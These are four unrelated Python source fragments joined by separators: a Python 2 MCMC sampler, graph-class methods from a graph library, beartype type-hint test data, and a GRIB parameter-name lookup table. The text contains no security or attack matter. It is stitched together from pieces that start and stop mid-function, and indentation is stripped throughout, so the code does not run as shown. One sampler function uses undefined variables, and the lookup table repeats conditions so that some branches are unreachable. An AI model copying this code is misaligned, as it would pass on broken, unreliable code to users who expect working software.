run = np.isfinite(priorDens)
new_theta = new_theta.reshape(len(rotated),len(params))
if np.sum(run) > 0: new_like[run] = log_dens_like(new_theta[run], data, params)
new_weight = new_like + priorDens
accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta) #accept_idx is as big as len(chains) and len(rotated)
accept_idx = accept_idx & (np.isfinite(new_weight))
chains = np.array(chains)
theta[chains[accept_idx]] = new_theta[accept_idx]
like[chains[accept_idx]] = new_like[accept_idx]
weight[chains[accept_idx]] = new_weight[accept_idx]
return theta, like, weight
def migrationHybrid_group(theta, phiMu, like, data, log_dens_like, priors, params, groupParams, hierParams, dist, rp, nJobs):
nSubj, nChains = theta.shape[0], theta.shape[1]
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
weight = np.sum(like, axis = 0) + log_dens_prior(phiMu, priors, dist)
noise = np.random.uniform(-rp, rp, size = (eta,1))
new_phiMu = np.zeros((len(rotated), len(groupParams)))
new_phiMu = phiMu[rotated] + noise
new_theta = theta[:,chains] + 0.0
new_theta[:,:,groupParams] = new_phiMu.reshape(1,len(rotated),len(groupParams)) + 0.0
prior = log_dens_prior(new_phiMu, priors, dist)
new_like = np.ones((nSubj, len(rotated))) * (-1 * np.inf) #keep this varied by subject so you can reuse it
run = np.isfinite(prior) #indices of non-zero likelihood
newLike = Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[subj,run], data[data['subj'] == subject], params) for subj, subject in enumerate(np.unique(data['subj'])))
for subj in xrange(nSubj): new_like[subj,run] = newLike[subj]
new_weight = prior + np.sum(new_like, axis = 0)
accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta)
accept_idx = accept_idx & (np.isfinite(new_weight))
chains = np.array(chains)
phiMu[chains[accept_idx]], weight[chains[accept_idx]], like[:,chains[accept_idx]] = new_phiMu[accept_idx], new_weight[accept_idx], new_like[:,accept_idx]
#NOTE BELOW: I wanted to do this with two lists: theta[:,chain[accept_idx],groupParams], but Python won't let you index with two lists. Might need to find another solution
for i, param in enumerate(groupParams):
theta[:,chains[accept_idx],param] = phiMu[chains[accept_idx],i].reshape(1,len(chains[accept_idx]))
return phiMu, theta, weight, like
#due to only operating on a single parameter, prior mu and sigma are separate
#theta and the phis are only of a single parameter
#...param: this is an index, not a parameter name
def migrationHyper(theta, phiMu, phiSigma, priors, dist, param, p, rp, kdePriors = None):
if kdePriors != None:
if p[param] in kdePriors['mu'].keys():
kdePriorsMu, kdePriorsSigma = kdePriors['mu'][p[param]], kdePriors['sigma'][p[param]]
else: kdePriorsMu, kdePriorsSigma = None, None
else: kdePriorsMu, kdePriorsSigma = None, None
nChains = len(phiMu)
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
noise = np.random.uniform(-rp, rp, size = eta)
new_phiMu, new_phiSigma = phiMu[rotated] + noise, phiSigma[rotated] + noise
hyperWeight = log_dens_hyper_and_prior_singleParam(theta, phiMu, phiSigma, priors, dist, param, kdePriorsMu, kdePriorsSigma)
new_hyperWeight = log_dens_hyper_and_prior_singleParam(theta[:,chains], new_phiMu, new_phiSigma, priors, dist, param, kdePriorsMu, kdePriorsSigma)
new_hyperWeight[np.isnan(new_hyperWeight)] = -1 * np.inf
accept_idx = np.exp(new_hyperWeight - hyperWeight[chains]) > uniform.rvs(size = eta) #accept_idx is eta by nParams
chains = np.array(chains)
phiMu[chains[accept_idx]] = new_phiMu[accept_idx]
phiSigma[chains[accept_idx]] = new_phiSigma[accept_idx]
hyperWeight[chains[accept_idx]] = new_hyperWeight[accept_idx]
return phiMu, phiSigma, hyperWeight
#this differs from the function above by looping through each of the parameters within the function, rather than in samplingHier
def migrationHyperBetween(thetas, phiMu, phiSigma, priors, dist, ps, hp, rp, kdePriors = None):
if kdePriors != None:
if p[param] in kdePriors['mu'].keys():
kdePriorsMu, kdePriorsSigma = kdePriors['mu'][p[param]], kdePriors['sigma'][p[param]]
else: kdePriorsMu, kdePriorsSigma = None, None
else: kdePriorsMu, kdePriorsSigma = None, None
nChains, nParams = phiMu.shape
hyperWeight = np.zeros((nChains, nParams))
for param in hp:
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
noise = np.random.uniform(-rp, rp, size = eta)
new_phiMu, new_phiSigma = phiMu[rotated,hp.index(param)] + noise, phiSigma[rotated,hp.index(param)] + noise
#create an array that contains all of the theta values that match the parameter
ths = []
for g in xrange(len(thetas)):
theta, p = thetas[g], ps[g]
if param in p:
th = theta[:,:,p.index(param)]
ths.append(th)
for g2 in xrange(len(ths)):
if g2 == 0: tht = ths[0]
else: tht = np.vstack((tht, ths[g2]))
hyperWeight[:, hp.index(param)] = log_dens_hyper_and_prior_singleParam(tht, phiMu[:,hp.index(param)], phiSigma[:,hp.index(param)], priors, dist, hp.index(param), kdePriorsMu, kdePriorsSigma)
new_hyperWeight = log_dens_hyper_and_prior_singleParam(tht[:,chains], new_phiMu, new_phiSigma, priors, dist, hp.index(param), kdePriorsMu, kdePriorsSigma)
new_hyperWeight[np.isnan(new_hyperWeight)] = -1 * np.inf
accept_idx = np.exp(new_hyperWeight - hyperWeight[chains,hp.index(param)]) > uniform.rvs(size = eta) #accept_idx is eta by nParams
chains = np.array(chains)
phiMu[chains[accept_idx], hp.index(param)] = new_phiMu[accept_idx]
phiSigma[chains[accept_idx], hp.index(param)] = new_phiSigma[accept_idx]
hyperWeight[chains[accept_idx], hp.index(param)] = new_hyperWeight[accept_idx]
return phiMu, phiSigma, hyperWeight
##### SAMPLING PHASE #####
def phiSample(phiMu, phiSigma, nChains):
nSamples, nParams = phiMu.shape
vals = range(nSamples)
shuffle(vals)
return phiMu[vals[0:nChains]], phiSigma[vals[0:nChains]]
def samplingHier(data, p, dist, log_dens_like, starts, priors, nChains = 4, nmc = 100, burnin = 0, thin = 1, nJobs = 4, informedStart = -1, cont = False, recalculate = False, pb = False, **kwargs):
print 'HIERARCHICAL FIT'
print '----------------'
print 'nChains: ' + str(nChains) + ' Burnin: ' + str(burnin) + ' nmc: ' + str(nmc) + ' thin: ' + str(thin)
print '# parameters: ' + str(len(p))
print p
print 'dist: ' + str(dist)
if 'gamma1' in kwargs.keys(): gamma1 = kwargs['gamma1']
else: gamma1 = False
if 'gammat0' in kwargs.keys(): gammat0 = kwargs['gammat0']
else: gammat0 = False
if gamma1 == True: print 'Using gamma = 1 every 10th iteration'
elif gammat0 == True: print 'Using gamma = | |
self.edges, self.adjacency = self.storagedriver(result.nodes, result.edges)
return self
def __iter__(self):
"""
Implement class __iter__
Iterate over nodes using iternodes
:return: single node Graph
:rtype: :graphit:Graph
"""
return self.iternodes()
def __len__(self):
"""
Implement class __len__
Represent the length of the graph as the number of nodes
:return: number of nodes
:rtype: int
"""
return len(self.nodes)
def __le__(self, other):
"""
Implement class __le__
Evaluates if self is less-then or equal to other in overall size
which is a combination of number of nodes and edges.
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return all([self.edges.keys() <= other.edges.keys(), self.nodes.keys() <= other.nodes.keys()])
def __lt__(self, other):
"""
Implement class __lt__
Evaluates if self is less-then other in overall size which is a
combination of number of nodes and edges.
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return all([self.edges.keys() < other.edges.keys(),
self.nodes.keys() < other.nodes.keys()])
def __ne__(self, other):
"""
Implement class __ne__
Evaluate non-equality based on graph topology
.. warning:: This comparison does not consider identity in node or
edge attributes.
"""
if not isinstance(other, GraphBase):
return False
return not self.__eq__(other)
def __repr__(self):
"""
Implement class __repr__
String representation of the class listing node and edge count.
:rtype: :py:str
"""
return '<{0} object {1}: {2} nodes, {3} edges>'.format(
type(self).__name__, id(self), len(self.nodes), len(self.edges))
def __setstate__(self, state):
"""
Implement class __setstate__
Enables the class to be unpickled. Required because the class uses
__slots__
:param state: object content for unpickling
:type state: :py:dict
"""
for key, value in state.items():
if key in self.__slots__:
setattr(self, key, value)
def __sub__(self, other):
"""
Implement class __sub__, subtraction (-).
If the two graphs share a common origin graph then a subtraction
will not update the attributes because attribute removal will also
affect all other subgraphs derived from it.
Graph subtraction is handled by the `graph_subtract` function.
:param other: Graph to subtract
:type other: :graphit:Graph
:return: difference graph
:rtype: :graphit:Graph
:raises: GraphitException, if other is not a Graph
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return graph_subtract(self, other)
@classmethod
def _get_class_object(cls):
"""
Returns the current class object. Used by the graph ORM to construct
new Graph based classes
"""
return cls
def _set_auto_nid(self):
"""
Set the automatically assigned node ID (nid) based on the '_id' node
attributes in the current graph
"""
_id = [attr.get('_id', 0) for attr in self.nodes.values()]
if len(_id):
self._nodeid = max(_id) + 1
def _set_origin(self, graph):
"""
Set a weak reference to the full graph
:param graph: Graph instance
"""
if isinstance(graph, GraphBase):
self.origin = weakref.ref(graph.origin)()
def add_edge(self, nd1, nd2, directed=None, node_from_edge=False, unicode_convert=True, run_edge_new=True,
**kwargs):
"""
Add edge between two nodes to the graph
An edge is defined as a connection between two node ID's.
Edge metadata defined as a dictionary allows it to be queried
by the various graph query functions.
After de new edge is created the edge class 'new' method is called once
to allow any custom edge initiation to be performed. This feature can
be customized by overloading the 'new' method in the
NodeEdgeToolsBaseClass abstract base class.
Calling the 'new' method can be disabled using the run_node_new flag.
:param nd1: first node in edge node pair. Source node in
directed graph.
:param nd2: second node in edge node pair. Target node in
directed graph.
:param directed: override the graph definition for directed
for the added edge.
:type directed: :py:bool
:param node_from_edge: make node for edge node id's not in graph
:type node_from_edge: :py:bool
:param unicode_convert: convert string types to unicode
:type unicode_convert: :py:bool
:param run_edge_new: run the custom initiation method (new method) of
the new edge once.
:type run_edge_new: :py:bool
:param kwargs: any additional keyword arguments to be added as
edge metadata.
:return: edge ID
:rtype: :py:tuple
"""
# If node_from_edge than set auto_nid to false forcing identical node
# and edge ID's
curr_auto_nid = self.auto_nid
if node_from_edge:
self.auto_nid = False
nd1 = to_unicode(nd1, convert=unicode_convert)
nd2 = to_unicode(nd2, convert=unicode_convert)
for nodeid in (nd1, nd2):
if nodeid not in self.nodes:
if node_from_edge:
self.add_node(nodeid)
else:
raise GraphitException('Node with id {0} not in graph.'.format(nodeid))
# Create edge tuples, directed or un-directed (local override possible for mixed graph).
if directed is None:
directed = self.directed
edges_to_add = make_edges((nd1, nd2), directed=directed)
edges_added = []
for i, edge in enumerate(edges_to_add):
if edge in self.edges:
logger.warning('Edge between nodes {0}-{1} exists. Use edge update to change attributes.'.format(*edge))
continue
# Undirectional edge: second edge points to first edge attributes
if i == 1 and not directed:
self.edges[edge] = self.edges[edges_to_add[0]]
else:
# Make a deepcopy of the added attributes
self.edges[edge] = prepaire_data_dict(copy.deepcopy(kwargs))
edges_added.append(edge)
logger.debug('Add edge between node {0}-{1}'.format(*edge))
# Call 'new' method of new edges once to allow for custom initiation
if run_edge_new:
for edge in edges_added:
self.getedges(edge).new()
# If node_from_edge, restore auto_nid setting
self.auto_nid = curr_auto_nid
return edges_to_add[0]
def add_edges(self, edges, node_from_edge=False, unicode_convert=True, run_edge_new=True, **kwargs):
"""
Add multiple edges to the graph.
This is the iterable version of the add_edge methods allowing
multiple edge additions from any iterable.
If the iterable yields a tuple with a dictionary as third
argument the key/value pairs of that dictionary will be added
as attributes to the new edge along with any keyword arguments
passed to the method.
The latter functionality can be used to add the edges of one
graph to those of another by using graph.edges.items() as
argument to `add_edges`.
:param edges: Objects to be added as edges to the graph
:type edges: Iterable of hashable objects
:param node_from_edge: make node for edge node id's not in graph
:type node_from_edge: :py:bool
:param unicode_convert: convert string types to unicode
:type unicode_convert: :py:bool
:param run_edge_new: run the custom initiation method (new method) of
the new edges once.
:type run_edge_new: :py:bool
:return: list of edge ids for the objects added in
the same order as th input iterable.
:rtype: :py:list
"""
edges_added = []
for edge in edges:
if len(edge) == 3 and isinstance(edge[2], dict):
attr = {}
attr.update(edge[2])
attr.update(kwargs)
edges_added.append(self.add_edge(edge[0], edge[1], node_from_edge=node_from_edge,
unicode_convert=unicode_convert, run_edge_new=run_edge_new, **attr))
else:
edges_added.append(self.add_edge(edge[0], edge[1], unicode_convert=unicode_convert,
node_from_edge=node_from_edge, run_edge_new=run_edge_new, **kwargs))
return edges_added
def add_node(self, node=None, unicode_convert=True, run_node_new=True, **kwargs):
"""
Add a node to the graph
All nodes are stored using a dictionary like data structure that can be
represented like:
{nid: {'_id': auto_nid, attribute_key: attribute_value, ....}}
'nid' is the primary node identifier which is either an auto-incremented
unique integer value if `Graph.auto_nid` equals True or a custom value
when False.
If `Graph.auto_nid` equals True, the `node` parameter is stored as part
of the node attributes (value in the above dict example) using the
`Graph.key_tag` as key unless overloaded by any additional keyword
arguments provided to the method.
Using the key_tag and value_tag is a convenient way of storing node
data that should be accessible using the same key. The key_tag and
value_tag are used as default in the various dictionary style set and
get methods of the graph, node and edge classes.
When `Graph.auto_nid` equals False, the `node` parameter becomes the
primary node identifier that can be any hashable object except None.
.. note:: With auto_nid disabled the method checks if there is a node
with nid in the graph already. If found, a warning is logged
and the attributes of the existing node are updated.
The node attribute dictionary contains at least the '_id' attribute
representing the unique auto-incremented integer node identifier and
any additional keyword argument provided to the method (kwargs)
After de new node is created the node class 'new' method is called once
to allow any custom node initiation to be performed. | |
<filename>beartype_test/a00_unit/data/hint/pep/proposal/_data_pep585.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2021 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide :pep:`585`-compliant **type hint test data.**
'''
# ....................{ IMPORTS }....................
from beartype._util.py.utilpyversion import IS_PYTHON_AT_LEAST_3_9
# ....................{ ADDERS }....................
def add_data(data_module: 'ModuleType') -> None:
'''
Add :pep:`585`-compliant type hint test data to various global containers
declared by the passed module.
Parameters
----------
data_module : ModuleType
Module to be added to.
'''
# If the active Python interpreter targets less than Python < 3.9, this
# interpreter fails to support PEP 585. In this case, reduce to a noop.
if not IS_PYTHON_AT_LEAST_3_9:
return
# Else, the active Python interpreter targets at least Python >= 3.9 and
# thus supports PEP 585.
# ..................{ IMPORTS }..................
# Defer Python >= 3.9-specific imports.
import re
from beartype._cave._cavefast import IntType
from beartype._data.hint.pep.sign.datapepsigns import (
HintSignByteString,
HintSignCallable,
HintSignContextManager,
HintSignDict,
HintSignGeneric,
HintSignList,
HintSignMatch,
HintSignMutableSequence,
HintSignPattern,
HintSignSequence,
HintSignTuple,
HintSignType,
)
from beartype_test.a00_unit.data.data_type import (
Class,
Subclass,
SubclassSubclass,
OtherClass,
OtherSubclass,
# OtherSubclassSubclass,
context_manager_factory,
)
from beartype_test.a00_unit.data.hint.util.data_hintmetacls import (
HintPepMetadata,
HintPithSatisfiedMetadata,
HintPithUnsatisfiedMetadata,
)
from collections.abc import (
ByteString,
Callable,
Container,
Iterable,
MutableSequence,
Sequence,
Sized,
)
from contextlib import AbstractContextManager
from re import Match, Pattern
from typing import Any, TypeVar, Union
# ..................{ TYPEVARS }..................
S = TypeVar('S')
'''
User-defined generic :mod:`typing` type variable.
'''
T = TypeVar('T')
'''
User-defined generic :mod:`typing` type variable.
'''
# ..................{ CLASSES ~ generics : single }..................
class Pep585GenericUntypevaredSingle(list[str]):
'''
:pep:`585`-compliant user-defined generic subclassing a single
subscripted (but unparametrized) builtin type.
'''
# Redefine this generic's representation for debugging purposes.
def __repr__(self) -> str:
return f'{self.__class__.__name__}({super().__repr__()})'
class Pep585GenericTypevaredSingle(list[S, T]):
'''
:pep:`585`-compliant user-defined generic subclassing a single
parametrized builtin type.
'''
# Redefine this generic's representation for debugging purposes.
def __repr__(self) -> str:
return f'{self.__class__.__name__}({super().__repr__()})'
# ..................{ CLASSES ~ generics : multiple }..................
class Pep585GenericUntypevaredMultiple(
Callable, AbstractContextManager[str], Sequence[str]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple
subscripted (but unparametrized) :mod:`collection.abc` abstract base
classes (ABCs) *and* an unsubscripted :mod:`collection.abc` ABC.
'''
# ................{ INITIALIZERS }................
def __init__(self, sequence: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(sequence, tuple), f'{repr(sequence)} not tuple.'
self._sequence = sequence
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __call__(self) -> int:
return len(self)
def __contains__(self, obj: object) -> bool:
return obj in self._sequence
def __enter__(self) -> object:
return self
def __exit__(self, *args, **kwargs) -> bool:
return False
def __getitem__(self, index: int) -> object:
return self._sequence[index]
def __iter__(self) -> bool:
return iter(self._sequence)
def __len__(self) -> bool:
return len(self._sequence)
def __reversed__(self) -> object:
return self._sequence.reverse()
class Pep585GenericTypevaredShallowMultiple(Iterable[T], Container[T]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple directly
parametrized :mod:`collections.abc` abstract base classes (ABCs).
'''
# ................{ INITIALIZERS }................
def __init__(self, iterable: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(iterable, tuple), f'{repr(iterable)} not tuple.'
self._iterable = iterable
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __contains__(self, obj: object) -> bool:
return obj in self._iterable
def __iter__(self) -> bool:
return iter(self._iterable)
class Pep585GenericTypevaredDeepMultiple(
Sized, Iterable[tuple[S, T]], Container[tuple[S, T]]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple
indirectly parametrized (but unsubscripted) :mod:`collections.abc`
abstract base classes (ABCs) *and* an unsubscripted and unparametrized
:mod:`collections.abc` ABC.
'''
# ................{ INITIALIZERS }................
def __init__(self, iterable: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(iterable, tuple), f'{repr(iterable)} not tuple.'
self._iterable = iterable
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __contains__(self, obj: object) -> bool:
return obj in self._iterable
def __iter__(self) -> bool:
return iter(self._iterable)
def __len__(self) -> bool:
return len(self._iterable)
# ..................{ PRIVATE ~ forwardref }..................
_TEST_PEP585_FORWARDREF_CLASSNAME = (
'beartype_test.a00_unit.data.data_type.Subclass')
'''
Fully-qualified classname of an arbitrary class guaranteed to be
importable.
'''
_TEST_PEP585_FORWARDREF_TYPE = Subclass
'''
Arbitrary class referred to by :data:`_PEP484_FORWARDREF_CLASSNAME`.
'''
# ..................{ MAPPINGS }..................
# Add PEP 585-specific test type hints to this dictionary global.
data_module.HINTS_PEP_META.extend((
# ................{ BYTESTRING }................
# Byte string of integer constants satisfying the builtin "int" type.
#
# Note that *ALL* byte strings necessarily contain only integer
# constants, regardless of whether those byte strings are instantiated
# as "bytes" or "bytearray" instances. Ergo, subscripting
# "collections.abc.ByteString" by any class other than those satisfying
# the standard integer protocol raises a runtime error from @beartype.
# Yes, this means that subscripting "collections.abc.ByteString"
# conveys no information and is thus nonsensical. Welcome to PEP 585.
HintPepMetadata(
hint=ByteString[int],
pep_sign=HintSignByteString,
isinstanceable_type=ByteString,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Byte string constant.
HintPithSatisfiedMetadata(b'Ingratiatingly'),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('For an Ǽeons’ æon.'),
),
),
# Byte string of integer constants satisfying the stdlib
# "numbers.Integral" protocol.
HintPepMetadata(
hint=ByteString[IntType],
pep_sign=HintSignByteString,
isinstanceable_type=ByteString,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Byte array initialized from a byte string constant.
HintPithSatisfiedMetadata(bytearray(b'Cutting Wit')),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Of birch‐rut, smut‐smitten papers and'),
),
),
# ................{ CALLABLE }................
# Callable accepting no parameters and returning a string.
HintPepMetadata(
hint=Callable[[], str],
pep_sign=HintSignCallable,
isinstanceable_type=Callable,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Lambda function returning a string constant.
HintPithSatisfiedMetadata(lambda: 'Eudaemonia.'),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('...grant we heal'),
),
),
# ................{ CONTEXTMANAGER }................
# Context manager yielding strings.
HintPepMetadata(
hint=AbstractContextManager[str],
pep_sign=HintSignContextManager,
isinstanceable_type=AbstractContextManager,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Context manager.
HintPithSatisfiedMetadata(
pith=lambda: context_manager_factory(
'We were mysteries, unwon'),
is_context_manager=True,
is_pith_factory=True,
),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('We donned apportionments'),
),
),
# ................{ DICT }................
# Flat dictionary.
HintPepMetadata(
hint=dict[int, str],
pep_sign=HintSignDict,
isinstanceable_type=dict,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Dictionary mapping integer keys to string values.
HintPithSatisfiedMetadata({
1: 'For taxing',
2: "To a lax and golden‐rendered crucifixion, affix'd",
}),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'To that beep‐prattling, LED‐ and lead-rattling crux'),
),
),
# Generic dictionary.
HintPepMetadata(
hint=dict[S, T],
pep_sign=HintSignDict,
isinstanceable_type=dict,
is_typevars=True,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Dictionary mapping string keys to integer values.
HintPithSatisfiedMetadata({
'Less-ons"-chastened': 2,
'Chanson': 1,
}),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('Swansong.'),
),
),
# ................{ GENERATOR }................
# Note that testing generators requires creating generators, which
# require a different syntax to that of standard callables; ergo,
# generator type hints are tested elsewhere.
# ................{ GENERICS ~ single }................
# Note that PEP 585-compliant generics are *NOT* explicitly detected as
# PEP 585-compliant due to idiosyncrasies in the CPython implementation
# of these generics. Ergo, we intentionally do *NOT* set
# "is_pep585_builtin=True," below.
# Generic subclassing a single unparametrized builtin container.
HintPepMetadata(
hint=Pep585GenericUntypevaredSingle,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericUntypevaredSingle,
is_pep585_generic=True,
is_args=False,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericUntypevaredSingle((
'Forgive our Vocation’s vociferous publications',
'Of',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Hourly sybaritical, pub sabbaticals'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'Materially ostracizing, itinerant‐',
'Anchoretic digimonks initiating',
]),
),
),
# Generic subclassing a single parametrized builtin containerr.
HintPepMetadata(
hint=Pep585GenericTypevaredSingle,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredSingle,
is_pep585_generic=True,
is_typevars=True,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericTypevaredSingle((
'Pleasurable, Raucous caucuses',
'Within th-in cannon’s cynosure-ensuring refectories',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'We there-in leather-sutured scriptured books'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'We laboriously let them boringly refactor',
'Of Meme‐hacked faith’s abandonment, retroactively',
]),
),
),
# Generic subclassing a single parametrized builtin container, itself
# parametrized by the same type variables in the same order.
HintPepMetadata(
hint=Pep585GenericTypevaredSingle[S, T],
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredSingle,
is_pep585_generic=True,
is_typevars=True,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericTypevaredSingle((
'Bandage‐managed',
'Into Faithless redaction’s didact enactment — crookedly',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Down‐bound'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'To prayer',
'To Ɯṙaith‐like‐upwreathed ligaments',
]),
),
),
# ................{ GENERICS ~ multiple }................
# Generic subclassing multiple unparametrized "collection.abc" abstract
# base class (ABCs) *AND* an unsubscripted "collection.abc" ABC.
HintPepMetadata(
hint=Pep585GenericUntypevaredMultiple,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericUntypevaredMultiple,
is_pep585_generic=True,
is_args=False,
piths_satisfied_meta=(
# Subclass-specific generic 2-tuple of string constants.
HintPithSatisfiedMetadata(Pep585GenericUntypevaredMultiple((
'Into a viscerally Eviscerated eras’ meditative hallways',
'Interrupting Soul‐viscous, vile‐ly Viceroy‐insufflating',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('Initiations'),
# 2-tuple of string constants.
HintPithUnsatisfiedMetadata((
"Into a fat mendicant’s",
'Endgame‐defendant, dedicate rants',
)),
),
),
# Generic subclassing multiple parametrized "collections.abc" abstract
# base classes (ABCs).
HintPepMetadata(
hint=Pep585GenericTypevaredShallowMultiple,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredShallowMultiple,
is_pep585_generic=True,
| |
<filename>pyeccodes/defs/grib1/localConcepts/efkl/name_def.py
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 253 and indicatorOfParameter == 228:
return 'Instantaneous Wind Speed in m/s'
if table2Version == 253 and indicatorOfParameter == 210:
return 'Clutter corrected ceflectivity'
if table2Version == 253 and indicatorOfParameter == 209:
return 'Multiplicity Of The Flash, Number'
if table2Version == 253 and indicatorOfParameter == 204:
return 'Total hail precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'Instant graupel in kg/m2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'Graupel precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 200:
return 'Kinetic energy of turbulence in J kg-1'
if table2Version == 253 and indicatorOfParameter == 187:
return 'Height of cloud top'
if table2Version == 253 and indicatorOfParameter == 186:
return 'Cloud base height'
if table2Version == 253 and indicatorOfParameter == 185:
return 'Solid precipitation (f.ex. snow+graupel)'
if table2Version == 253 and indicatorOfParameter == 184:
return 'Instant snowfall rate in mm/s or mm/h'
if table2Version == 253 and indicatorOfParameter == 184:
return 'Snowfall accumulation in mm'
if table2Version == 253 and indicatorOfParameter == 181:
return 'Instant rain in kg/m2'
if table2Version == 253 and indicatorOfParameter == 163:
return 'V-component of wind gust'
if table2Version == 253 and indicatorOfParameter == 162:
return 'U-component of wind gust'
if table2Version == 253 and indicatorOfParameter == 160:
return 'Convective available potential energy'
if table2Version == 253 and indicatorOfParameter == 144:
return 'Precipitation type'
if table2Version == 253 and indicatorOfParameter == 135:
return 'Icing warning index, values between 0 ... 4'
if table2Version == 253 and indicatorOfParameter == 125:
return 'V-component of momentum flux in N m-2'
if table2Version == 253 and indicatorOfParameter == 124:
return 'U-component of momentum flux in N m-2'
if table2Version == 253 and indicatorOfParameter == 122:
return 'Sensible heat flux'
if table2Version == 253 and indicatorOfParameter == 121:
return 'Latent heat flux'
if table2Version == 253 and indicatorOfParameter == 117:
return 'Global radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 115:
return 'Long wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 114:
return 'Net long wave radiation accumulation, top of atmosphere'
if table2Version == 253 and indicatorOfParameter == 114:
return 'Net long wave radiation, top of athmosphere'
if table2Version == 253 and indicatorOfParameter == 113:
return 'Net short wave radiation accumulation, top of atmosphere'
if table2Version == 253 and indicatorOfParameter == 113:
return 'Net short wave radiation, top of athmosphere'
if table2Version == 253 and indicatorOfParameter == 112:
return 'Net long wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 111:
return 'Net short wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 103:
return 'Peak wave period in s'
if table2Version == 253 and indicatorOfParameter == 102:
return 'Significant wave height in m'
if table2Version == 253 and indicatorOfParameter == 101:
return 'Mean wave direction at spectral peak in degrees'
if table2Version == 253 and indicatorOfParameter == 91:
return 'Ice Cover, 1=ice, 0=no ice'
if table2Version == 253 and indicatorOfParameter == 86:
return 'Soil Moisture Content in Kg per square meter'
if table2Version == 253 and indicatorOfParameter == 84:
return 'ALBEDO 0 to 1'
if table2Version == 253 and indicatorOfParameter == 83:
return 'Surface Roughness in Meters'
if table2Version == 253 and indicatorOfParameter == 81:
return 'Land Cover, 1=land, 0=sea'
if table2Version == 253 and indicatorOfParameter == 76:
return 'Cloud water'
if table2Version == 253 and indicatorOfParameter == 75:
return 'High Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 74:
return 'Medium Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 73:
return 'Low Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 71:
return 'Cloudiness 0...1'
if table2Version == 253 and indicatorOfParameter == 67:
return 'Mixed layer height in m'
if table2Version == 253 and indicatorOfParameter == 66:
return 'Snow Depth in Meters'
if table2Version == 253 and indicatorOfParameter == 61:
return 'Total precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 58:
return 'Cloud ice'
if table2Version == 253 and indicatorOfParameter == 57:
return 'Evaporation in mm'
if table2Version == 253 and indicatorOfParameter == 54:
return 'Precipitable water in mm'
if table2Version == 253 and indicatorOfParameter == 52:
return 'Relative Humidity in percents'
if table2Version == 253 and indicatorOfParameter == 51:
return 'Specific Humidity in kg/kg'
